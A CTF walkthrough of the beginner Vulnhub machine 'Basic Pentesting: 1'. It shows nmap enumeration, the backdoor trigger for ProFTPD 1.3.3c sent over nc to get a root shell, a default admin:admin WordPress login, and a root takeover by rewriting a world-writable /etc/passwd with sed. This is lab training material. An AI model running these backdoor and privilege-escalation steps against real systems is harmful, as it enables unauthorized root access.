CTF Walkthrough - Basic Pentesting: 1
Information
- Difficulty: ★☆☆☆☆
- Fun: ★☆☆☆☆
- URL: Vulnhub
- Author: Josiah Pierce
- Goal: Get root privileges
Intro
According to the Vulnhub description, this machine is intended to newcomers. It has different ways to get to the goal (rooting the machine). The machine is pretty realistic (I have found similar scenarios on real life pentestings), which makes it… Well, not amusing. But still, it’s nice for beginners to practice!
Walkthrough
Identification and Enumeration
The first thing to do is identify the target IP. Luckily it answers to ping
requests, so a simple fping
will make it:
root@kali:~# fping -aqg 192.168.10.0/24
[...]
192.168.10.195
After some seconds, fping
spits a handful of IPs. The only unknown address in
that list is 192.168.10.195
, which should be my new guest, and my target IP.
Then, as always, nmap
is used to get all of the information about the
services running in the machine.
nmap -sT -p- -A -vvv -oA nmap 192.168.10.195
[...]
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ProFTPD 1.3.3c
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
FTP
The first thing to notice is that ProFTPD 1.3.3c is a backdoored version
(found using searchsploit
). The package distribution was compromised by an
attacker, distributing a compromised version of the software. Not cool! The
full compromise report can be found
here.
Luckily for us, we don’t need to defend the machine, but attack it. Of course, this backdoor is completely documented, and we can make use of it. The manual PoC is really simple (the full information may be found here), so let’s try it:
root@kali:~# nc 192.168.10.195 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.10.195]
HELP ACIDBITCHEZ
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
That was fast, root in a few minutes. But this machine isn’t over!
Of course, we can also make use of this backdoor using Metasploit, which take
us the need for searching the manual PoC. Given my environment, the default
Metasploit payload for this case (cmd/unix/reverse
on port 4444) works for
me, so this is also a super easy job:
FTP successfully completed!
HTTP
Now this is where this machine starts to get interesting. nmap
detects an
Apache on port 80, let’s see:
Well, not too impressive. Maybe there’s something else on the web server…
root@kali:~# dirb 'http://192.168.10.195'
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 8 22:38:47 2018
URL_BASE: http://192.168.10.195/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.195/ ----
+ http://192.168.10.195/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.10.195/secret/
[...]
A secret
directory, that’s better. This path contains a Wordpress blog, with
the default “Hello world!” post. Maybe the administration login panel is found
on the default location, wp-login
?
It is! However, something important happened. The URL is not an IP anymore, the
browser followed a redirection to http://vtsec/secret/wp-login
. In my
network, I don’t need to make further adjustments, as my DNS/DHCP server
handles the situation correctly, and resolves the hostname of the VM to the
actual IP. When this isn’t the case, a new entry in /etc/hosts
should be
added, so the web application works correctly.
Of course, the first thing to try here is the classical h4x0r technique: login
with admin:admin
. And it works!
Now, as the admin
username has actual administration privileges, the easiest
thing to do is using a Metasploit module to make use of this permissions and
get code execution on the server:
We have a shell with limited permissions (user www-data
), so we need to find
a way to escalate privileges in the machine. First of all, let’s retrieve
/etc/passwd
, just in case:
www-data@vtcsec:$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[... system users ...]
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
[... more system users ...]
There is a single non-system user (besides of root
), marlinspike
. I’ll make
note of it, just in case.
Something else should be noted here. These are the permissions of the file
/etc/passwd
:
www-data@vtcsec:$ ls -lah /etc/passwd
-rw-rw-rw- 1 root root 2.4K Nov 16 13:02 /etc/passwd
The file is world-writable! Usually, UNIX systems divide the user login information in two files:
-
/etc/passwd
: Stores username, encrypted/hashed password, user and group ID, comment, home directory, and command interpreter. If password isx
, then the hashed password is stored in/etc/shadow
. World-readable, but not usually world-writable (permissions644
, ownerroot
). More info:man 5 passwd
. -
/etc/shadow
: Used to store password information. Stores username, encrypted/hashed password, and other account validity stuff (password age, last change date, account expiration date…). Only readable by root (permissions600
, ownerroot
). More info:man 5 shadow
.
So, if we can write on /etc/passwd
, it means we can set the password for any
user, even if it has been previously set on /etc/shadow
. Even the root user!
First of all, we need to generate a password hash (using a salt):
root@kali:~# mkpasswd -5 delicious oatmeals
$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1
Then, we change the root
entry, so the x
in the password field is replaced
by our delicious hashed password:
www-data@vtcsec:$ cat /etc/passwd | sed 's/root:x/root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1/' > /etc/passwd
www-data@vtcsec:$ cat /etc/passwd
root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:0:0:root:/root:/bin/bash
[... more users ...]
And then…
We got root!
SSH
There is one more service running in the machine: SSH. However, the installed version does not appear vulnerable
We made note of an existing user, though. And password login is enabled, there is no need of finding a private key. What if…
Bingo!
Privilege escalation process would be exactly the same, as the user
marlinspike
can also write on /etc/passwd
.
Final words
As its name establishes, this is a basic boot2root machine intended for beginner practice. It shows different ways to get into a vulnerable machine, which may be useful for your day-to-day pentesting operation. For more advanced pentesters, this is not the funniest machine to pwn.
All done here, have a nice day!